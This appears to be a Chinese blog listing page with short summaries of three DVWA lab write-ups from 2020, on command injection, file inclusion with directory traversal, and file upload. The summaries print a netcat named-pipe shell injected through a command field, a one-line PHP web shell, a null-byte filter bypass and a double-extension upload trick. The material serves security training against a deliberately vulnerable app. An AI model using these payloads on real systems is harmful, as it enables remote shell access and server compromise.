2020年2月6日
DVWA-命令执行
摘要: 开门见山 ·Low ·Medium ·High · 命令执行监听端口 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe nc 192.168.31.100 4444 · 反弹shell 拷贝shell文件 启动kali的apache服 阅读全文
posted @ 2020-02-06 15:41 joker0xxx3 阅读(447) 评论(0) 推荐(0) 编辑
DVWA-目录遍历-文件包含
摘要: 开门见山 · 目录遍历 替换成 2. 文件包含可以使用 绝对路径 也可以 3. 可以使用文件包含来包含一个网址,或者是一个shell 远程文件 空字符绕过字符过滤 %00 阅读全文
posted @ 2020-02-06 15:37 joker0xxx3 阅读(623) 评论(0) 推荐(0) 编辑
DVWA--文件上传
摘要: 开门见山 1. 准备一个shell <?php echo shell_exec($_GET['cmd']);?> 2. 上传文件 3. 利用shell 4. Burp抓包,1是文件大小,2是文件类型 5. mimetype判断文件类型 6. 使用1.php.jpg 绕过一些文件后缀检查 7. 图片1 阅读全文
posted @ 2020-02-06 15:24 joker0xxx3 阅读(233) 评论(0) 推荐(0) 编辑